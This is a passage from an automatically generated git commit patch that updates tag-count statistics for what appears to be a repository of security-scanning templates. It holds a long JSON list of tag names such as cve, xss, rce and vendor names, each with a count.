=?UTF-8?q?chore:=20generate=20templates=20stats?= =?UTF-8?q?=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 11627 +++++++++++++++++++++-------------------- TOP-10.md | 18 +- 3 files changed, 5844 insertions(+), 5803 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 429dabc158..26354a2563 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2743},{"name":"panel","count":1201},{"name":"wordpress","count":1035},{"name":"exposure","count":994},{"name":"xss","count":945},{"name":"wp-plugin","count":904},{"name":"osint","count":807},{"name":"tech","count":722},{"name":"lfi","count":712},{"name":"misconfig","count":710},{"name":"rce","count":655},{"name":"edb","count":597},{"name":"packetstorm","count":550},{"name":"wpscan","count":522},{"name":"cve2021","count":493},{"name":"cve2022","count":477},{"name":"wp","count":458},{"name":"cve2023","count":433},{"name":"sqli","count":411},{"name":"devops","count":403},{"name":"unauth","count":385},{"name":"authenticated","count":365},{"name":"cloud","count":360},{"name":"detect","count":359},{"name":"file","count":345},{"name":"intrusive","count":336},{"name":"login","count":328},{"name":"kev","count":282},{"name":"cve2020","count":257},{"name":"cve2024","count":248},{"name":"token-spray","count":243},{"name":"default-login","count":243},{"name":"oast","count":234},{"name":"microsoft","count":233},{"name":"top-200","count":229},{"name":"config","count":227},{"name":"apache","count":219},{"name":"malware","count":212},{"name":"osint-social","count":210},{"name":"azure","count":208},{"name":"network","count":202},{"name":"token","count":194},{"name":"","count":193},{"name":"azure-cloud-config","count":191},{"name":"cve2018","count":170},{"name":"iot","count":169},{"name":"cve2019","count":165},{"name":"install","count":160},{"name":"keys","count":156},{"name":"joomla","count":148},{"name":"auth-bypass","count":147},{"name":"redirect","count":143},{"name":"tcp","count":138},{"name":"aws","count":136},{"name":"ssrf","count":130},{"name":"amazon","count":118},{"name":"phishing","count":117},{"name":"cms","count":115},{"name":"files","count":114},{"name":"cve2017","count":113},{"name":"cve2010","count":112},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":91},{"name":"disclosure","count":90},{"name":"linux","count":85},{"name":"seclists","count":82},{"name":"code","count":81},{"name":"local","count":80},{"name":"takeover","count":79},{"name":"privesc","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":74},{"name":"kubernetes","count":73},{"name":"oss","count":71},{"name":"js","count":70},{"name":"cisco","count":70},{"name":"enum","count":65},{"name":"adobe","count":64},{"name":"ir","count":63},{"name":"k8s","count":62},{"name":"huntr","count":61},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"c2","count":57},{"name":"detection","count":57},{"name":"cve2016","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"tenable","count":49},{"name":"cve2014","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"php","count":46},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"aem","count":45},{"name":"generic","count":45},{"name":"osint-gaming","count":45},{"name":"deserialization","count":44},{"name":"jndi","count":44},{"name":"cnvd","count":44},{"name":"debug","count":44},{"name":"traversal","count":43},{"name":"oa","count":43},{"name":"osint-hobby","count":42},{"name":"plugin","count":42},{"name":"osint-porn","count":42},{"name":"springboot","count":41},{"name":"misc","count":40},{"name":"injection","count":40},{"name":"ibm","count":39},{"name":"listing","count":39},{"name":"miscellaneous","count":38},{"name":"cti","count":37},{"name":"file-upload","count":37},{"name":"jira","count":37},{"name":"fuzz","count":35},{"name":"osint-misc","count":35},{"name":"k8s-cluster-security","count":34},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"tls","count":32},{"name":"dlink","count":32},{"name":"devsecops","count":32},{"name":"osint-tech","count":31},{"name":"wp-theme","count":31},{"name":"fortinet","count":31},{"name":"gitlab","count":30},{"name":"api","count":30},{"name":"osint-coding","count":30},{"name":"ec2","count":30},{"name":"lfr","count":28},{"name":"dns","count":27},{"name":"proxy","count":27},{"name":"bestwebsoft","count":27},{"name":"citrix","count":27},{"name":"info-leak","count":27},{"name":"manageengine","count":26},{"name":"zohocorp","count":26},{"name":"firewall","count":26},{"name":"cve2012","count":26},{"name":"printer","count":26},{"name":"ssh","count":26},{"name":"tomcat","count":26},{"name":"admin","count":26},{"name":"xxe","count":26},{"name":"weaver","count":25},{"name":"zoho","count":25},{"name":"dast","count":25},{"name":"prestashop","count":25},{"name":"postgresql","count":24},{"name":"osint-shopping","count":24},{"name":"yonyou","count":24},{"name":"osint-business","count":24},{"name":"osint-finance","count":24},{"name":"osint-images","count":24},{"name":"stored-xss","count":23},{"name":"cicd","count":23},{"name":"audit","count":23},{"name":"dashboard","count":22},{"name":"s3","count":22},{"name":"github","count":22},{"name":"weblogic","count":21},{"name":"ecology","count":21},{"name":"msf","count":21},{"name":"ftp","count":20},{"name":"wavlink","count":20},{"name":"nginx","count":20},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"rukovoditel","count":19},{"name":"vpn","count":19},{"name":"confluence","count":19},{"name":"grafana","count":19},{"name":"apt","count":19},{"name":"coldfusion","count":19},{"name":"hp","count":19},{"name":"nsg","count":19},{"name":"headless","count":19},{"name":"ssti","count":19},{"name":"struts","count":19},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"backdoor","count":18},{"name":"xwiki","count":18},{"name":"node.js","count":18},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"honeypot","count":17},{"name":"microweber","count":17},{"name":"ivanti","count":17},{"name":"bypass","count":17},{"name":"magento","count":17},{"name":"mail","count":17},{"name":"backup","count":17},{"name":"zyxel","count":17},{"name":"service","count":16},{"name":"osint-blog","count":16},{"name":"status","count":16},{"name":"setup","count":16},{"name":"installer","count":16},{"name":"cve2009","count":16},{"name":"netgear","count":16},{"name":"alibaba","count":16},{"name":"rconfig","count":16},{"name":"redis","count":16},{"name":"jarm","count":16},{"name":"cve2008","count":15},{"name":"nagios","count":15},{"name":"moosocial","count":15},{"name":"seeyon","count":15},{"name":"docker","count":15},{"name":"java","count":15},{"name":"woocommerce","count":15},{"name":"cve2013","count":15},{"name":"tongda","count":15},{"name":"ruby","count":15},{"name":"redhat","count":15},{"name":"cnvd2021","count":15},{"name":"mysql","count":15},{"name":"ofbiz","count":15},{"name":"node","count":14},{"name":"npm","count":14},{"name":"rds","count":14},{"name":"git","count":14},{"name":"dell","count":14},{"name":"jboss","count":14},{"name":"login-check","count":14},{"name":"icewarp","count":14},{"name":"osint-art","count":14},{"name":"nodejs","count":14},{"name":"smtp","count":14},{"name":"creds-stuffing","count":14},{"name":"osint-health","count":14},{"name":"domainmod","count":14},{"name":"sonicwall","count":13},{"name":"windows","count":13},{"name":"instrusive","count":13},{"name":"hashicorp","count":13},{"name":"osint-dating","count":13},{"name":"kafka","count":13},{"name":"zimbra","count":13},{"name":"cache","count":13},{"name":"laravel","count":13},{"name":"graphql","count":13},{"name":"cuppacms","count":13},{"name":"cuppa","count":13},{"name":"auth","count":13},{"name":"abstractapi","count":13},{"name":"rails","count":13},{"name":"airflow","count":13},{"name":"fortigate","count":13},{"name":"osint-political","count":13},{"name":"deployments","count":12},{"name":"netsweeper","count":12},{"name":"spring","count":12},{"name":"vbulletin","count":12},{"name":"progress","count":12},{"name":"doppler","count":12},{"name":"hikvision","count":12},{"name":"storage","count":12},{"name":"drupal","count":12},{"name":"glpi","count":12},{"name":"fuzzing","count":12},{"name":"newrelic","count":12},{"name":"smb","count":12},{"name":"jetbrains","count":12},{"name":"phpgurukul","count":12},{"name":"dedecms","count":12},{"name":"appservice","count":12},{"name":"webserver","count":12},{"name":"crlf","count":11},{"name":"fastjson","count":11},{"name":"django","count":11},{"name":"xstream","count":11},{"name":"osint-video","count":11},{"name":"keyvault","count":11},{"name":"thinkphp","count":11},{"name":"iis","count":11},{"name":"iam","count":11},{"name":"phpmyadmin","count":11},{"name":"blind","count":11},{"name":"zabbix","count":11},{"name":"jolokia","count":11},{"name":"prometheus","count":11},{"name":"dropbox","count":10},{"name":"f5","count":10},{"name":"xstream_project","count":10},{"name":"symfony","count":10},{"name":"elasticsearch","count":10},{"name":"secret","count":10},{"name":"digitalocean","count":10},{"name":"openai","count":10},{"name":"samsung","count":10},{"name":"python","count":10},{"name":"solr","count":10},{"name":"db","count":10},{"name":"dahua","count":10},{"name":"fortios","count":10},{"name":"sitecore","count":10},{"name":"solarview","count":10},{"name":"wso2","count":9},{"name":"joomla\\!","count":9},{"name":"druid","count":9},{"name":"gitea","count":9},{"name":"vcenter","count":9},{"name":"pfsense","count":9},{"name":"sophos","count":9},{"name":"mlflow","count":9},{"name":"kube","count":9},{"name":"solarwinds","count":9},{"name":"cloudtrail","count":9},{"name":"moodle","count":9},{"name":"console","count":9},{"name":"servicenow","count":9},{"name":"versa","count":9},{"name":"cnvd2020","count":9},{"name":"facebook","count":9},{"name":"bitbucket","count":9},{"name":"elastic","count":9},{"name":"scada","count":9},{"name":"sangfor","count":9},{"name":"gateway","count":9},{"name":"exchange","count":9},{"name":"opencats","count":9},{"name":"lucee","count":9},{"name":"artica","count":9},{"name":"firebase","count":9},{"name":"ldap","count":8},{"name":"odoo","count":8},{"name":"openemr","count":8},{"name":"cloud-enum","count":8},{"name":"nacos","count":8},{"name":"oauth","count":8},{"name":"wanhu","count":8},{"name":"spotweb_project","count":8},{"name":"bigip","count":8},{"name":"metadata","count":8},{"name":"spotweb","count":8},{"name":"atom","count":8},{"name":"phpjabbers","count":8},{"name":"recon","count":8},{"name":"discord","count":8},{"name":"sql","count":8},{"name":"bloofox","count":8},{"name":"cisco-switch","count":8},{"name":"landray","count":8},{"name":"hms","count":8},{"name":"aks","count":8},{"name":"security","count":8},{"name":"vmss","count":8},{"name":"nexus","count":8},{"name":"manager","count":8},{"name":"avtech","count":8},{"name":"go","count":8},{"name":"microfocus","count":8},{"name":"config-audit","count":8},{"name":"e-office","count":8},{"name":"lfprojects","count":8},{"name":"unauthenticated","count":8},{"name":"osint-news","count":8},{"name":"azure-storage","count":8},{"name":"strapi","count":8},{"name":"cacti","count":8},{"name":"emerge","count":8},{"name":"mirai","count":8},{"name":"ognl","count":8},{"name":"nagiosxi","count":8},{"name":"bucket","count":8},{"name":"huawei","count":8},{"name":"phpinfo","count":8},{"name":"default-page","count":8},{"name":"symantec","count":8},{"name":"exploitdb","count":7},{"name":"vrealize","count":7},{"name":"pmb","count":7},{"name":"gradio","count":7},{"name":"keycloak","count":7},{"name":"error","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"oos","count":7},{"name":"monstra","count":7},{"name":"mongodb","count":7},{"name":"websphere","count":7},{"name":"moodating","count":7},{"name":"linkedin","count":7},{"name":"activemq","count":7},{"name":"squirrelmail","count":7},{"name":"pods","count":7},{"name":"mobileiron","count":7},{"name":"vpc","count":7},{"name":"fpd","count":7},{"name":"couchdb","count":7},{"name":"contec","count":7},{"name":"telesquare","count":7},{"name":"teamcity","count":7},{"name":"keking","count":7},{"name":"slack","count":7},{"name":"database","count":7},{"name":"gogs","count":7},{"name":"nextjs","count":7},{"name":"maps","count":7},{"name":"rat","count":7},{"name":"filemanager","count":7},{"name":"leak","count":7},{"name":"rfi","count":7},{"name":"blockchain","count":7},{"name":"shopify","count":7},{"name":"virtual-machines","count":7},{"name":"splunk","count":7},{"name":"twitter","count":7},{"name":"vms","count":7},{"name":"ruckus","count":7},{"name":"opensis","count":7},{"name":"geoserver","count":7},{"name":"cnvd2023","count":7},{"name":"jeecg","count":7},{"name":"nortekcontrol","count":7},{"name":"online_fire_reporting_system_project","count":6},{"name":"doctor-appointment-system","count":6},{"name":"spip","count":6},{"name":"akamai","count":6},{"name":"asp","count":6},{"name":"jamf","count":6},{"name":"74cms","count":6},{"name":"api-management","count":6},{"name":"chanjet","count":6},{"name":"microstrategy","count":6},{"name":"online-fire-reporting","count":6},{"name":"paloaltonetworks","count":6},{"name":"totolink","count":6},{"name":"craftcms","count":6},{"name":"jwt","count":6},{"name":"openvpn","count":6},{"name":"advantech","count":6},{"name":"zhiyuan","count":6},{"name":"learnpress","count":6},{"name":"functionapp","count":6},{"name":"synacor","count":6},{"name":"cve2007","count":6},{"name":"gcp","count":6},{"name":"cockpit","count":6},{"name":"beyondtrust","count":6},{"name":"webmin","count":6},{"name":"paypal","count":6},{"name":"pyload","count":6},{"name":"flutterwave","count":6},{"name":"mikrotik","count":6},{"name":"express","count":6},{"name":"sonarqube","count":6},{"name":"froxlor","count":6},{"name":"minio","count":6},{"name":"magmi","count":6},{"name":"dom","count":6},{"name":"jetty","count":6},{"name":"typo3","count":6},{"name":"liferay","count":6},{"name":"asus","count":6},{"name":"tikiwiki","count":6},{"name":"kubelet","count":6},{"name":"plesk","count":6},{"name":"bmc","count":6},{"name":"cobbler","count":6},{"name":"avideo","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"virtual-machine","count":6},{"name":"chamilo","count":6},{"name":"h3c","count":6},{"name":"server","count":6},{"name":"elfinder","count":6},{"name":"log","count":6},{"name":"goanywhere","count":5},{"name":"gnu","count":5},{"name":"magmi_project","count":5},{"name":"telerik","count":5},{"name":"circarlife","count":5},{"name":"papercut","count":5},{"name":"digitaldruid","count":5},{"name":"fit2cloud","count":5},{"name":"eyoucms","count":5},{"name":"mantisbt","count":5},{"name":"piwigo","count":5},{"name":"gocd","count":5},{"name":"decision-center","count":5},{"name":"http","count":5},{"name":"react","count":5},{"name":"fatpipe","count":5},{"name":"swagger","count":5},{"name":"apisix","count":5},{"name":"openstack","count":5},{"name":"esafenet","count":5},{"name":"hoteldruid","count":5},{"name":"thedigitalcraft","count":5},{"name":"chatgpt","count":5},{"name":"glpi-project","count":5},{"name":"avaya","count":5},{"name":"cloudflare","count":5},{"name":"adminer","count":5},{"name":"carrental","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"zzzcms","count":5},{"name":"tibco","count":5},{"name":"firmware","count":5},{"name":"webview","count":5},{"name":"webkul","count":5},{"name":"awstats","count":5},{"name":"genetechsolutions","count":5},{"name":"dolibarr","count":5},{"name":"qdpm","count":5},{"name":"voip","count":5},{"name":"terramaster","count":5},{"name":"xmlrpc","count":5},{"name":"axigen","count":5},{"name":"apollo","count":5},{"name":"ethereum","count":5},{"name":"redmine","count":5},{"name":"cdata","count":5},{"name":"wpdevart","count":5},{"name":"caucho","count":5},{"name":"openfire","count":5},{"name":"10web","count":5},{"name":"checkpoint","count":5},{"name":"ems","count":5},{"name":"wbce","count":5},{"name":"schneider-electric","count":5},{"name":"resin","count":5},{"name":"password","count":5},{"name":"etcd","count":5},{"name":"mssql","count":5},{"name":"httpd","count":5},{"name":"qnap","count":5},{"name":"percha","count":5},{"name":"blackenergy","count":5},{"name":"matrix","count":5},{"name":"spark","count":5},{"name":"elementor","count":5},{"name":"sftp","count":5},{"name":"asana","count":5},{"name":"circontrol","count":5},{"name":"connectwise","count":5},{"name":"nuuo","count":5},{"name":"sentry","count":5},{"name":"api-server","count":5},{"name":"crushftp","count":5},{"name":"rseenet","count":5},{"name":"web3","count":5},{"name":"metinfo","count":5},{"name":"agentejo","count":5},{"name":"parallels","count":5},{"name":"dionaea","count":5},{"name":"tenda","count":5},{"name":"square","count":5},{"name":"kkfileview","count":5},{"name":"hybris","count":5},{"name":"acm","count":5},{"name":"graylog","count":5},{"name":"sysaid","count":5},{"name":"open-emr","count":5},{"name":"hpe","count":5},{"name":"jupyter","count":5},{"name":"jellyfin","count":5},{"name":"jabber","count":5},{"name":"adb","count":5},{"name":"shiro","count":4},{"name":"kyocera","count":4},{"name":"bittrex","count":4},{"name":"panos","count":4},{"name":"figma","count":4},{"name":"hongfan","count":4},{"name":"pega","count":4},{"name":"subrion","count":4},{"name":"osint-archived","count":4},{"name":"artifactory","count":4},{"name":"hospital_management_system_project","count":4},{"name":"churchcrm","count":4},{"name":"bitrix","count":4},{"name":"photo","count":4},{"name":"flink","count":4},{"name":"jsf","count":4},{"name":"pentaho","count":4},{"name":"cnvd2019","count":4},{"name":"sql-database","count":4},{"name":"pmb_project","count":4},{"name":"stripe","count":4},{"name":"powerjob","count":4},{"name":"info","count":4},{"name":"harbor","count":4},{"name":"intelbras","count":4},{"name":"superwebmailer","count":4},{"name":"audiocodes","count":4},{"name":"dragonfly","count":4},{"name":"imgproxy","count":4},{"name":"okta","count":4},{"name":"age-encryption","count":4},{"name":"royalevent","count":4},{"name":"monitor","count":4},{"name":"casaos","count":4},{"name":"sigb","count":4},{"name":"mooveagency","count":4},{"name":"pip","count":4},{"name":"aura","count":4},{"name":"codeigniter","count":4},{"name":"owncloud","count":4},{"name":"newstatpress","count":4},{"name":"ad","count":4},{"name":"ray","count":4},{"name":"gnuboard","count":4},{"name":"sound4","count":4},{"name":"metabase","count":4},{"name":"mostracms","count":4},{"name":"consul","count":4},{"name":"pcoweb","count":4},{"name":"mautic","count":4},{"name":"gradle","count":4},{"name":"springcloud","count":4},{"name":"linksys","count":4},{"name":"zend","count":4},{"name":"sendgrid","count":4},{"name":"prtg","count":4},{"name":"juniper","count":4},{"name":"containers","count":4},{"name":"centos","count":4},{"name":"igniterealtime","count":4},{"name":"thimpress","count":4},{"name":"kevinlab","count":4},{"name":"account-takeover","count":4},{"name":"roxy","count":4},{"name":"flickr","count":4},{"name":"metersphere","count":4},{"name":"supsystic","count":4},{"name":"creativeitem","count":4},{"name":"opencms","count":4},{"name":"proftpd","count":4},{"name":"kingsoft","count":4},{"name":"mitel","count":4},{"name":"jorani","count":4},{"name":"kibana","count":4},{"name":"candidats","count":4},{"name":"veronalabs","count":4},{"name":"httpserver","count":4},{"name":"rabbitmq","count":4},{"name":"dvr","count":4},{"name":"wireguard","count":4},{"name":"terra-master","count":4},{"name":"ghost","count":4},{"name":"search","count":4},{"name":"osgeo","count":4},{"name":"mostra","count":4},{"name":"angular","count":4},{"name":"horde","count":4},{"name":"changedetection","count":4},{"name":"easypost","count":4},{"name":"datadog","count":4},{"name":"myeventon","count":4},{"name":"projectsend","count":4},{"name":"pie-register","count":4},{"name":"os4ed","count":4},{"name":"arcgis","count":4},{"name":"umbraco","count":4},{"name":"rocketchat","count":4},{"name":"zte","count":4},{"name":"bamboo","count":4},{"name":"heroku","count":4},{"name":"linuxfoundation","count":4},{"name":"kentico","count":4},{"name":"ampache","count":4},{"name":"aria","count":4},{"name":"wcs","count":4},{"name":"eclipse","count":4},{"name":"aspose","count":4},{"name":"openam","count":4},{"name":"codoso","count":4},{"name":"linkerd","count":4},{"name":"harmistechnology","count":4},{"name":"ebs","count":4},{"name":"env","count":4},{"name":"cnvd2022","count":4},{"name":"newstatpress_project","count":4},{"name":"jfrog","count":4},{"name":"yeswiki","count":4},{"name":"dotnet","count":4},{"name":"ternaria","count":4},{"name":"rubyonrails","count":4},{"name":"grav","count":4},{"name":"reprisesoftware","count":4},{"name":"tiki","count":4},{"name":"e-mobile","count":4},{"name":"salesforce","count":4},{"name":"d-link","count":4},{"name":"finicity","count":4},{"name":"wp-statistics","count":4},{"name":"webshell","count":4},{"name":"nosqli","count":4},{"name":"panabit","count":4},{"name":"dahuasecurity","count":4},{"name":"articatech","count":4},{"name":"metasploit","count":4},{"name":"tplink","count":4},{"name":"thinkcmf","count":4},{"name":"pixie","count":4},{"name":"joomlamo","count":4},{"name":"webmail","count":4},{"name":"puppet","count":4},{"name":"mailchimp","count":4},{"name":"cookie","count":4},{"name":"telegram","count":4},{"name":"ransomware","count":4},{"name":"djangoproject","count":4},{"name":"cve2005","count":4},{"name":"pluginus","count":4},{"name":"postmessage","count":4},{"name":"moveit","count":4},{"name":"seagate","count":4},{"name":"phpjabber","count":4},{"name":"flatpress","count":4},{"name":"temenos","count":4},{"name":"globalprotect","count":4},{"name":"sugarcrm","count":4},{"name":"confluent","count":4},{"name":"esri","count":4},{"name":"auieo","count":4},{"name":"phppgadmin","count":4},{"name":"hongdian","count":4},{"name":"concrete","count":4},{"name":"mcafee","count":4},{"name":"gibbon","count":3},{"name":"fuelcms","count":3},{"name":"spotify","count":3},{"name":"storage-account","count":3},{"name":"webalizer","count":3},{"name":"rstudio","count":3},{"name":"petya","count":3},{"name":"mongo","count":3},{"name":"afterlogic","count":3},{"name":"messaging","count":3},{"name":"webkul-qloapps","count":3},{"name":"c3325","count":3},{"name":"csti","count":3},{"name":"postgres","count":3},{"name":"adafruit","count":3},{"name":"sofacy","count":3},{"name":"ufida","count":3},{"name":"getsimple","count":3},{"name":"webui","count":3},{"name":"waf","count":3},{"name":"selea","count":3},{"name":"ixcache","count":3},{"name":"itop","count":3},{"name":"modem","count":3},{"name":"ruckuswireless","count":3},{"name":"sonatype","count":3},{"name":"lansweeper","count":3},{"name":"school_dormitory_management_system_project","count":3},{"name":"neo4j","count":3},{"name":"unifi","count":3},{"name":"carel","count":3},{"name":"casdoor","count":3},{"name":"favicon","count":3},{"name":"listserv","count":3},{"name":"ueditor","count":3},{"name":"ithemes","count":3},{"name":"synapse","count":3},{"name":"cgi","count":3},{"name":"zendesk","count":3},{"name":"fanruan","count":3},{"name":"sharepoint","count":3},{"name":"wordfence","count":3},{"name":"wpdeveloper","count":3},{"name":"botnet","count":3},{"name":"tplus","count":3},{"name":"netlify","count":3},{"name":"tautulli","count":3},{"name":"gvectors","count":3},{"name":"automattic","count":3},{"name":"revive","count":3},{"name":"monitorr","count":3},{"name":"tp-link","count":3},{"name":"aptus","count":3},{"name":"calibre","count":3},{"name":"shell","count":3},{"name":"clusterengine","count":3},{"name":"truenas","count":3},{"name":"repetier","count":3},{"name":"xampp","count":3},{"name":"fortra","count":3},{"name":"sony","count":3},{"name":"draytek","count":3},{"name":"xoops","count":3},{"name":"javascript","count":3},{"name":"complete_online_job_search_system_project","count":3},{"name":"siemens","count":3},{"name":"academylms","count":3},{"name":"backdrop","count":3},{"name":"inspur","count":3},{"name":"mapbox","count":3},{"name":"trendnet","count":3},{"name":"hsphere","count":3},{"name":"bonita","count":3},{"name":"fastly","count":3},{"name":"ansible","count":3},{"name":"dataease","count":3},{"name":"postman","count":3},{"name":"intercom","count":3},{"name":"rlm","count":3},{"name":"ampps","count":3},{"name":"jumpserver","count":3},{"name":"buffalo","count":3},{"name":"thefactory","count":3},{"name":"fossbilling","count":3},{"name":"dokuwiki","count":3},{"name":"pgadmin","count":3},{"name":"mobsf","count":3},{"name":"netdata","count":3},{"name":"zeroshell","count":3},{"name":"qualitor","count":3},{"name":"gitblit","count":3},{"name":"adiscon","count":3},{"name":"udp","count":3},{"name":"idrac","count":3},{"name":"mojoportal","count":3},{"name":"dos","count":3},{"name":"digitalrebar","count":3},{"name":"phpmyfaq","count":3},{"name":"canon","count":3},{"name":"yii","count":3},{"name":"strangerstudios","count":3},{"name":"rubygems","count":3},{"name":"dzzoffice","count":3},{"name":"redash","count":3},{"name":"jeesns","count":3},{"name":"reddit","count":3},{"name":"voipmonitor","count":3},{"name":"cluster","count":3},{"name":"superset","count":3},{"name":"learndash","count":3},{"name":"epson","count":3},{"name":"airtable","count":3},{"name":"osticket","count":3},{"name":"etsy","count":3},{"name":"hjsoft","count":3},{"name":"sharefile","count":3},{"name":"droneci","count":3},{"name":"sitemap","count":3},{"name":"webtareas","count":3},{"name":"thinfinity","count":3},{"name":"e-cology","count":3},{"name":"western_digital","count":3},{"name":"r-seenet","count":3},{"name":"label-studio","count":3},{"name":"apple","count":3},{"name":"vm","count":3},{"name":"limesurvey","count":3},{"name":"diagrams","count":3},{"name":"decision-server","count":3},{"name":"obiz","count":3},{"name":"ispconfig","count":3},{"name":"qlik","count":3},{"name":"network-security-group","count":3},{"name":"camaleon","count":3},{"name":"i3geo","count":3},{"name":"avada","count":3},{"name":"thruk","count":3},{"name":"dreambox","count":3},{"name":"octoprint","count":3},{"name":"revive-adserver","count":3},{"name":"3cx","count":3},{"name":"soplanning","count":3},{"name":"digital-watchdog","count":3},{"name":"netfortris","count":3},{"name":"targa","count":3},{"name":"mailgun","count":3},{"name":"suitecrm","count":3},{"name":"softwarepublico","count":3},{"name":"electron","count":3},{"name":"graph","count":3},{"name":"apim","count":3},{"name":"woodwing","count":3},{"name":"nifi","count":3},{"name":"cpanel","count":3},{"name":"loytec","count":3},{"name":"mpsec","count":3},{"name":"passcv","count":3},{"name":"cdn","count":3},{"name":"credential","count":3},{"name":"self-hosted","count":3},{"name":"tableau","count":3},{"name":"webnus","count":3},{"name":"nc","count":3},{"name":"lighttpd","count":3},{"name":"geowebserver","count":3},{"name":"segment","count":3},{"name":"aruba","count":3},{"name":"register","count":3},{"name":"weiphp","count":3},{"name":"anonymous","count":3},{"name":"openbmcs","count":3},{"name":"copyparty","count":3},{"name":"posh","count":3},{"name":"drawio","count":3},{"name":"opencart","count":3},{"name":"jitsi","count":3},{"name":"joomlacomponent.inetlanka","count":3},{"name":"ninjaforms","count":3},{"name":"xerox","count":3},{"name":"webcam","count":3},{"name":"hfs","count":3},{"name":"cve2004","count":3},{"name":"yzmcms","count":3},{"name":"enterprise","count":3},{"name":"watchguard","count":3},{"name":"fileman","count":3},{"name":"structurizr","count":3},{"name":"covenant","count":3},{"name":"saltstack","count":3},{"name":"dotnetnuke","count":3},{"name":"rancher","count":3},{"name":"key","count":3},{"name":"jeedom","count":3},{"name":"cloudwatch","count":3},{"name":"axway","count":3},{"name":"axis","count":3},{"name":"nortek","count":3},{"name":"emqx","count":3},{"name":"webtareas_project","count":3},{"name":"zerof","count":3},{"name":"webadmin","count":3},{"name":"teampass","count":3},{"name":"fanwei","count":3},{"name":"flexvnf","count":3},{"name":"labkey","count":3},{"name":"pandorafms","count":3},{"name":"circleci","count":3},{"name":"superadmin","count":3},{"name":"xxljob","count":3},{"name":"nuxtjs","count":3},{"name":"actuator","count":3},{"name":"sns","count":3},{"name":"newsletter","count":3},{"name":"nuget","count":3},{"name":"backdropcms","count":3},{"name":"boldgrid","count":3},{"name":"kfm","count":3},{"name":"instagram","count":3},{"name":"securepoint","count":3},{"name":"sharp","count":3},{"name":"kavita","count":3},{"name":"clientid","count":3},{"name":"trixbox","count":3},{"name":"wp-cross-rss","count":3},{"name":"dubbo","count":3},{"name":"bigant","count":3},{"name":"pypi","count":3},{"name":"selenium","count":3},{"name":"veeam","count":3},{"name":"forum","count":3},{"name":"file-read","count":3},{"name":"flutter","count":3},{"name":"glassfish","count":3},{"name":"httpbin","count":3},{"name":"cloudstack","count":3},{"name":"sql-server","count":3},{"name":"magnolia","count":3},{"name":"std42","count":3},{"name":"bitrix24","count":3},{"name":"default","count":3},{"name":"openwrt","count":3},{"name":"zeit","count":3},{"name":"bash","count":3},{"name":"forgerock","count":3},{"name":"grp","count":3},{"name":"contentful","count":3},{"name":"netflix","count":3},{"name":"qts","count":3},{"name":"management-system","count":3},{"name":"contribsys","count":3},{"name":"dotcms","count":3},{"name":"cybelesoft","count":3},{"name":"phpipam","count":3},{"name":"discourse","count":3},{"name":"evlink","count":3},{"name":"finereport","count":3},{"name":"telnet","count":3},{"name":"steve","count":3},{"name":"cups","count":3},{"name":"samba","count":3},{"name":"sqlite","count":3},{"name":"cas","count":3},{"name":"lotus","count":3},{"name":"wwbn","count":3},{"name":"smart","count":3},{"name":"movable","count":3},{"name":"vercel","count":3},{"name":"emlog","count":3},{"name":"dev.pucit.edu.pk","count":3},{"name":"passive","count":3},{"name":"switch","count":3},{"name":"particle","count":3},{"name":"pulsar","count":3},{"name":"imap","count":3},{"name":"processwire","count":3},{"name":"modoboa","count":3},{"name":"rpm","count":3},{"name":"open-web-analytics","count":3},{"name":"sudo","count":3},{"name":"h2o","count":3},{"name":"octobercms","count":3},{"name":"influxdb","count":3},{"name":"freshrss","count":3},{"name":"payara","count":3},{"name":"shenyu","count":3},{"name":"mythic","count":3},{"name":"sidekiq","count":3},{"name":"idor","count":3},{"name":"rackn","count":3},{"name":"smuggling","count":3},{"name":"axis2","count":3},{"name":"eshop","count":3},{"name":"rundeck","count":3},{"name":"finecms","count":3},{"name":"sauter","count":2},{"name":"dataiku","count":2},{"name":"ecstatic","count":2},{"name":"tshirtecommerce","count":2},{"name":"mosparo","count":2},{"name":"pop3","count":2},{"name":"pinot","count":2},{"name":"zblogcn","count":2},{"name":"ebay","count":2},{"name":"avantfax","count":2},{"name":"csrf","count":2},{"name":"dbgate","count":2},{"name":"twitch","count":2},{"name":"photo-gallery","count":2},{"name":"nystudio107","count":2},{"name":"kubeview","count":2},{"name":"relatedposts","count":2},{"name":"influxdata","count":2},{"name":"load-balancer","count":2},{"name":"virustotal","count":2},{"name":"gallery","count":2},{"name":"graphite","count":2},{"name":"domxss","count":2},{"name":"sensei-lms","count":2},{"name":"rdp","count":2},{"name":"motorola","count":2},{"name":"deployment","count":2},{"name":"discuz","count":2},{"name":"intellian","count":2},{"name":"terraform","count":2},{"name":"seeddms","count":2},{"name":"uwsgi","count":2},{"name":"embed","count":2},{"name":"duplicator","count":2},{"name":"hostheader-injection","count":2},{"name":"mqtt","count":2},{"name":"mega","count":2},{"name":"viewpoint","count":2},{"name":"evilmartians","count":2},{"name":"adivaha","count":2},{"name":"seowon","count":2},{"name":"netsparker","count":2},{"name":"cloudcenter","count":2},{"name":"dvwa","count":2},{"name":"episerver","count":2},{"name":"defacement","count":2},{"name":"eko","count":2},{"name":"mybb","count":2},{"name":"htmli","count":2},{"name":"apikey","count":2},{"name":"messenger","count":2},{"name":"embedthis","count":2},{"name":"tornado","count":2},{"name":"pathtraversal","count":2},{"name":"ericsson","count":2},{"name":"aryanic","count":2},{"name":"cosmosdb","count":2},{"name":"aspcms","count":2},{"name":"cloudpanel","count":2},{"name":"syslog","count":2},{"name":"openresty","count":2},{"name":"nasos","count":2},{"name"